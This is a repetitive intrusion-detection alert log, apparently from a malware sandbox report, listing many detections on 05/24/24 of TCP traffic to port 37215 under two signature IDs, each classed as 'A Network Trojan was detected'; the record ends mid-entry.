              Timestamp:05/24/24-10:58:58.313540
              SID:2829579
              Source Port:36082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441449
              SID:2835222
              Source Port:48390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.993875
              SID:2829579
              Source Port:55380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289153
              SID:2835222
              Source Port:46782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061260
              SID:2835222
              Source Port:48810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343632
              SID:2829579
              Source Port:42572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624080
              SID:2829579
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661991
              SID:2835222
              Source Port:45644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502930
              SID:2835222
              Source Port:40366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536469
              SID:2835222
              Source Port:53822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692683
              SID:2835222
              Source Port:45662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502372
              SID:2835222
              Source Port:46552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395604
              SID:2829579
              Source Port:52250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482952
              SID:2835222
              Source Port:40022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726065
              SID:2829579
              Source Port:46578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097383
              SID:2835222
              Source Port:56490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494251
              SID:2829579
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070698
              SID:2829579
              Source Port:38726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116101
              SID:2829579
              Source Port:49666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270464
              SID:2835222
              Source Port:57252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697043
              SID:2829579
              Source Port:60394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.068874
              SID:2835222
              Source Port:43630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.964068
              SID:2829579
              Source Port:52698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313625
              SID:2829579
              Source Port:41892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864953
              SID:2829579
              Source Port:45118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079818
              SID:2835222
              Source Port:40380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383292
              SID:2829579
              Source Port:36266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449322
              SID:2829579
              Source Port:43668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623107
              SID:2829579
              Source Port:54780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188638
              SID:2829579
              Source Port:50020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478949
              SID:2835222
              Source Port:48178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241918
              SID:2835222
              Source Port:52154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926578
              SID:2835222
              Source Port:48500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430756
              SID:2835222
              Source Port:51482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395004
              SID:2835222
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536535
              SID:2835222
              Source Port:35162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586136
              SID:2829579
              Source Port:54248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538044
              SID:2829579
              Source Port:49310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433795
              SID:2835222
              Source Port:36218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623217
              SID:2829579
              Source Port:54890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235601
              SID:2835222
              Source Port:51080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625611
              SID:2835222
              Source Port:60158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663311
              SID:2829579
              Source Port:59592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371982
              SID:2835222
              Source Port:35230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545437
              SID:2835222
              Source Port:45664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100698
              SID:2829579
              Source Port:58422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209601
              SID:2829579
              Source Port:48838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.971034
              SID:2829579
              Source Port:47600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575193
              SID:2835222
              Source Port:46872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797839
              SID:2829579
              Source Port:40806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048917
              SID:2835222
              Source Port:35442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100809
              SID:2829579
              Source Port:45894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420429
              SID:2829579
              Source Port:47032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923270
              SID:2829579
              Source Port:51908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535913
              SID:2835222
              Source Port:52430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638562
              SID:2829579
              Source Port:57070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447160
              SID:2835222
              Source Port:49404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483645
              SID:2829579
              Source Port:60794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671685
              SID:2829579
              Source Port:33472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537304
              SID:2829579
              Source Port:55418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358595
              SID:2829579
              Source Port:42856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233716
              SID:2829579
              Source Port:41290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233559
              SID:2829579
              Source Port:58080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041247
              SID:2829579
              Source Port:56508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458300
              SID:2835222
              Source Port:40022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861992
              SID:2835222
              Source Port:35462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372064
              SID:2835222
              Source Port:36654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858343
              SID:2829579
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537559
              SID:2835222
              Source Port:58922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283407
              SID:2835222
              Source Port:59744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481889
              SID:2835222
              Source Port:56006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573539
              SID:2829579
              Source Port:47876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070781
              SID:2835222
              Source Port:38746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.593806
              SID:2835222
              Source Port:49590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505795
              SID:2835222
              Source Port:43160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978045
              SID:2829579
              Source Port:37018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694761
              SID:2829579
              Source Port:42984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155739
              SID:2829579
              Source Port:54060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486005
              SID:2835222
              Source Port:47298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279818
              SID:2829579
              Source Port:41656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918346
              SID:2835222
              Source Port:60496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188082
              SID:2829579
              Source Port:57114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230966
              SID:2835222
              Source Port:56110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302919
              SID:2835222
              Source Port:37394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702323
              SID:2829579
              Source Port:45452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078063
              SID:2835222
              Source Port:44444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122749
              SID:2829579
              Source Port:55504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538653
              SID:2835222
              Source Port:34074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.318009
              SID:2835222
              Source Port:60364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885961
              SID:2829579
              Source Port:37194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187095
              SID:2835222
              Source Port:44172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148457
              SID:2835222
              Source Port:43342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235253
              SID:2829579
              Source Port:44106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965803
              SID:2829579
              Source Port:59114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550726
              SID:2829579
              Source Port:47800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396717
              SID:2835222
              Source Port:39204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116960
              SID:2835222
              Source Port:33060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603809
              SID:2829579
              Source Port:58454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400514
              SID:2835222
              Source Port:51190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071479
              SID:2835222
              Source Port:51416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070960
              SID:2829579
              Source Port:36238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625654
              SID:2829579
              Source Port:42478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059806
              SID:2829579
              Source Port:40804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482814
              SID:2829579
              Source Port:37074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856729
              SID:2829579
              Source Port:51612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347627
              SID:2835222
              Source Port:60640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.114128
              SID:2835222
              Source Port:43228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457888
              SID:2835222
              Source Port:57988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099806
              SID:2835222
              Source Port:51912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634040
              SID:2829579
              Source Port:45426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120500
              SID:2829579
              Source Port:37318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055432
              SID:2835222
              Source Port:54592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582690
              SID:2829579
              Source Port:49162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2829579
              Source Port:60340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836390
              SID:2835222
              Source Port:60664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117931
              SID:2835222
              Source Port:44958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309198
              SID:2835222
              Source Port:39234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208144
              SID:2829579
              Source Port:53742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536882
              SID:2829579
              Source Port:33734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111942
              SID:2835222
              Source Port:40698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206473
              SID:2829579
              Source Port:43488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538244
              SID:2829579
              Source Port:56836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097785
              SID:2829579
              Source Port:35902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188648
              SID:2829579
              Source Port:38002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689666
              SID:2829579
              Source Port:41934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802680
              SID:2835222
              Source Port:52610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194023
              SID:2829579
              Source Port:46806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.580544
              SID:2835222
              Source Port:54084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203306
              SID:2835222
              Source Port:41434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576547
              SID:2829579
              Source Port:54870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157147
              SID:2835222
              Source Port:60756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397784
              SID:2829579
              Source Port:49652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402301
              SID:2835222
              Source Port:39170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116617
              SID:2835222
              Source Port:49592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402690
              SID:2835222
              Source Port:36996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516341
              SID:2829579
              Source Port:50540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113589
              SID:2835222
              Source Port:57626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233431
              SID:2829579
              Source Port:39870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517396
              SID:2829579
              Source Port:59700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313246
              SID:2835222
              Source Port:41606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401461
              SID:2835222
              Source Port:52994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502011
              SID:2835222
              Source Port:56820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168654
              SID:2829579
              Source Port:51722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501758
              SID:2829579
              Source Port:44316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662521
              SID:2835222
              Source Port:58750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447260
              SID:2835222
              Source Port:59434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358440
              SID:2829579
              Source Port:51554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485306
              SID:2835222
              Source Port:33602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116104
              SID:2835222
              Source Port:35120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705865
              SID:2835222
              Source Port:60470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573236
              SID:2835222
              Source Port:46104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120763
              SID:2829579
              Source Port:38304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053839
              SID:2835222
              Source Port:55796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390582
              SID:2829579
              Source Port:50936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193875
              SID:2829579
              Source Port:36066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574746
              SID:2835222
              Source Port:52314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205918
              SID:2829579
              Source Port:54258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685024
              SID:2835222
              Source Port:53030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520237
              SID:2829579
              Source Port:49076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572409
              SID:2835222
              Source Port:33772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.822627
              SID:2835222
              Source Port:39276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313525
              SID:2835222
              Source Port:39450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358855
              SID:2835222
              Source Port:44492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332378
              SID:2835222
              Source Port:53344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625196
              SID:2835222
              Source Port:50388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150660
              SID:2835222
              Source Port:53354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279801
              SID:2829579
              Source Port:57724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.755718
              SID:2835222
              Source Port:42012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924232
              SID:2829579
              Source Port:37200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515517
              SID:2835222
              Source Port:38724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490500
              SID:2829579
              Source Port:38688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396696
              SID:2829579
              Source Port:56198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530869
              SID:2835222
              Source Port:54374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156370
              SID:2829579
              Source Port:55520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681326
              SID:2829579
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232624
              SID:2829579
              Source Port:46772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602530
              SID:2829579
              Source Port:56314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204804
              SID:2835222
              Source Port:51278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.147092
              SID:2829579
              Source Port:41874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397761
              SID:2835222
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478259
              SID:2829579
              Source Port:55472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574007
              SID:2835222
              Source Port:59718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329538
              SID:2829579
              Source Port:49220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433361
              SID:2835222
              Source Port:38470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602733
              SID:2835222
              Source Port:51140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.682380
              SID:2829579
              Source Port:49960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100582
              SID:2835222
              Source Port:57854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552432
              SID:2829579
              Source Port:36784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071546
              SID:2835222
              Source Port:48038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506731
              SID:2829579
              Source Port:56544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118461
              SID:2829579
              Source Port:59554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077012
              SID:2829579
              Source Port:35166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345274
              SID:2835222
              Source Port:45232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278901
              SID:2835222
              Source Port:58778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989702
              SID:2829579
              Source Port:48952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543710
              SID:2835222
              Source Port:55216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101464
              SID:2829579
              Source Port:39522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638277
